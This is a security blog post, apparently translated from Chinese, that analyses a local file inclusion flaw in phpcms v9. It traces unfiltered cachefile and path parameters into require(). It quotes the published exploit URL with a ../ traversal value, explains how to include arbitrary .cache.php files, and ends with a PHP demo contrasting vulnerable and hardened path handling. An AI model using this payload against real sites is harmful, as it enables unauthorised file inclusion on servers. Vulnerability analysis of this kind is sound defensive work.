Vulnerability Author: b4dboy
Blog: http://www.secoff.net/
Vulnerability Analysis: Seay
Blog: http://www.cnseay.com/
When reprinting, please retain the copyright notice above.
Yesterday I joked on Weibo that my blog was about to be shut down, and since then I have received phone calls, text messages, QQ messages, and private messages from friends; many others started backing up my blog posts... It hurts. Sorry, sorry.
My buddy b4dboy released the dedecms and phpcms v9 local file inclusion vulnerabilities. I have also done a detailed analysis of the dedecms vulnerability, but for certain reasons it cannot be released for now; it will go out in a couple of days. It hurts that some well-written articles cannot be published for certain reasons. It is really depressing and complicated. You can guess the specific reasons.
Here is the phpcms v9 one first. The original post is at http://www.cnseay.com/2530.
Starting from the exp the author published:

    http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=.../fuck
The vulnerable code is the ajax_getlist() function in get_menu.php. Let's take a look:
    function ajax_getlist() {
        $cachefile = $_GET['cachefile'];
        $path = $_GET['path'];
        $title = $_GET['title'];
        $key = $_GET['key'];
        $infos = getcache($cachefile, $path);
        $where_id = intval($_GET['parentid']);
        $parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]);
        // ... (rest of the function not shown on the original page)
The cachefile parameter from the exp lands here, taken straight from the request with no filtering:

    $cachefile = $_GET['cachefile'];

Following it further, it is passed directly into

    $infos = getcache($cachefile, $path);

so getcache() is called with two attacker-controlled values: the cache name and the module path. getcache() lives in \phpcms\libs\functions\global.func.php (the original page cites line 3):
    /**
     * Read cache. Defaults to file cache; the cache configuration is not loaded.
     * @param string $name     cache name
     * @param string $filepath data path (module name): caches/cache_$filepath/
     * @param string $config   configuration name
     */
    function getcache($name, $filepath = '', $type = 'file', $config = '') {
        pc_base::load_sys_class('cache_factory', '', 0);
        if ($config) {
            $cacheconfig = pc_base::load_config('cache');
            $cache = cache_factory::get_instance($cacheconfig)->get_cache($config);
        } else {
            $cache = cache_factory::get_instance()->get_cache($type);
        }
        return $cache->get($name, '', '', $filepath);
    }
You can clearly see that the $name variable passed in, i.e. the cache name, flows unchanged into $cache->get($name, '', '', $filepath);.
The get() function is in phpcms\libs\classes\cache_file.class.php:
    public function get($name, $setting = '', $type = 'data', $module = ROUTE_M) {
        $this->get_setting($setting);
        if(empty($type)) $type = 'data';
        if(empty($module)) $module = ROUTE_M;
        $filepath = CACHE_PATH.'caches_'.$module.'/caches_'.$type.'/';
        $filename = $name.$this->_setting['suf'];
        //echo $filepath.$filename;exit();
        if (!file_exists($filepath.$filename)) {
            return false;
        } else {
            if($this->_setting['type'] == 'array') {
                $data = @require($filepath.$filename);
I added echo $filepath.$filename;exit(); to print the resolved path, and it is clear at once: $module comes from the path parameter and $name from the cachefile parameter, neither is filtered, and the resulting path goes to require(). Because only the cache suffix is appended to $name, a cachefile value with enough ../ segments walks out of the caches directory and includes any file on the server whose name ends in that suffix, for example 1.cache.php in the web root. How many ../ are needed depends on where caches/caches_<path>/caches_data/ sits relative to the target file.
If you look around carefully you will find many functions built the same way. Go dig.
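To make the path arithmetic concrete, here is an added example (not phpcms code and not from the original post) that reproduces the $filepath/$filename construction of cache_file::get() with attacker-controlled cachefile and path values, resolves the ../ segments, and puts it beside a hardened variant that rejects anything other than a plain identifier. The cache root, the .cache.php suffix and the sample inputs are assumptions for the demo.

```php
<?php
// Added example, not phpcms code: mirror the path construction in
// cache_file::get() to show where cachefile/path values end up, then
// show a whitelist check that stops traversal before a path is built.
// Assumed values for the demo: CACHE_PATH and the cache file suffix.
const DEMO_CACHE_PATH = '/var/www/phpcms/caches/';
const DEMO_SUFFIX     = '.cache.php';

// Vulnerable form: same concatenation as get(), $name and $module unfiltered.
function build_cache_file(string $name, string $module, string $type = 'data'): string {
    $filepath = DEMO_CACHE_PATH . 'caches_' . $module . '/caches_' . $type . '/';
    return $filepath . $name . DEMO_SUFFIX;
}

// Collapse "." and ".." segments without touching the filesystem, so the
// resolved require() target can be shown even when the file does not exist.
function normalize_path(string $path): string {
    $out = [];
    foreach (explode('/', $path) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($out);
            continue;
        }
        $out[] = $seg;
    }
    return '/' . implode('/', $out);
}

// Hardened variant: cache name, module and type must be plain identifiers,
// and the normalized result must still lie under the cache root.
function safe_cache_file(string $name, string $module, string $type = 'data'): ?string {
    foreach ([$name, $module, $type] as $part) {
        if (!preg_match('/^[A-Za-z0-9_\-]+$/', $part)) {
            return null;
        }
    }
    $target = build_cache_file($name, $module, $type);
    $root   = rtrim(DEMO_CACHE_PATH, '/') . '/';
    if (strpos(normalize_path($target), $root) !== 0) {
        return null;
    }
    return $target;
}

// Constructed inputs: one legitimate call, then traversal via cachefile.
$cases = [
    ['menu',          'admin'],   // normal cache read
    ['../../1',       'b4dboy'],  // climbs to the caches/ directory
    ['../../../1',    'b4dboy'],  // climbs to the web root: 1.cache.php
];
foreach ($cases as [$name, $module]) {
    printf("cachefile=%-14s path=%s\n", $name, $module);
    printf("  vulnerable require() target: %s\n", normalize_path(build_cache_file($name, $module)));
    printf("  hardened:                    %s\n", safe_cache_file($name, $module) ?? 'REJECTED');
}
```

Run it with the php CLI. The third case resolves to /var/www/phpcms/1.cache.php, which is the "1.cache.php in the web root" situation above; the hardened function rejects both traversal cases at the regex before any path is built, and the root-prefix check is kept as a second line of defence in case the whitelist is ever loosened.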
Original article; please retain the copyright notice when reprinting.
This article is from the Seay blog, http://www.cnseay.com/
Focused on web security research and program reverse analysis.